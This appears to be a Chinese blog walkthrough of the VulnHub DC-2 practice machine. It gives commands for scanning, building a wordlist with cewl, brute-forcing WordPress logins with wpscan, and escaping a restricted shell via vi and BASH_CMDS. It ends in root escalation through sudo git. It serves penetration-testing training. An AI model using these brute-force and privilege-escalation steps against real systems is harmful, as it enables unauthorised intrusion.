一.靶机下载

官方链接: https://download.vulnhub.com/dc/DC-2.zip

网盘链接:https://pan.baidu.com/s/1zirpZ00DbhwKlfbMrmq-fQ 提取码: i3cc

导入之后要在设置中将其调为NAT模式

默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息

二.靶机信息收集

因为靶机与kali处于同一网络状态下,使用命令:arpscan -l 得到靶机的ip为:192.168.194.132

使用命令:nmap -A -p- 192.168.194.132 对靶机进行扫描

发现开放了80,7744端口,尝试进行访问,输入ip发现被解析为dc-2,我们想到dc-2这个域名解析失败,我们更改hosts文件,添加一个ip域名指向

使用命令:sudo nano /etc/hosts

192.168.194.132 dc-2 添加进去

再次进行访问

下滑点击flag发现flag1

三.暴力破解登录框

根据flag1提示使用cewl爬取一下密码本

使用命令:cewl http://dc-2 > passwd.txt 

cat passwd.txt 

cat passwd.txt

获取密码本之后我们要寻找登录框进行登录,所以我们要扫描他的目录

使用命令:dirb http://dc-2

扫描发现后台,进行访问

一眼发现这是WordPress,我们采用专门针对wordpress的工具wpscan来进行用户枚举

使用命令:wpscan --url http://dc-2/ -e u

使用命令:echo -e "admin\ntom\njerry" > username.txt 

使用命令:wpscan --url http://dc-2/ -U username.txt -P passwd.txt

成功爆破出账号密码:jerry/adipiscing  tom/parturient  登录进去后发现了flag2

四.暴力破解ssh

根据上面的信息收集我们还知道了ssh开放端口被换成了7744,我们尝试进行登录

使用命令:ssh tom@192.168.194.132 -p 7744 输入密码parturient

发现flag3.txt,但是无法使用cat查看,使用其他查看的命令

经过一段时间的尝试发现命令:vi flag3.txt 成功查看flag中的内容

五.vi提权

根据flag4的线索,我们现在应该转向jerry,su命令提示了提权

因为能使用vi命令,所以直接使用vi进行提权

使用命令(下面两条命令是写在vi底部的)

vi
:set shell=/bin/bash
:shell

六.git提权

想要使用su提权到jerry但是发现没办法使用

使用命令:BASH_CMDS[su]=/bin/sh;su

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

su jerry

使用命令:sudo-l 查看权限

使用命令:sudo git -p help config 

!/bin/bash

成功提权,切换到root

成功获取最后的flag!

如有错误请大佬们指正!

到这里我们也是成功通关了DC2靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!

Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐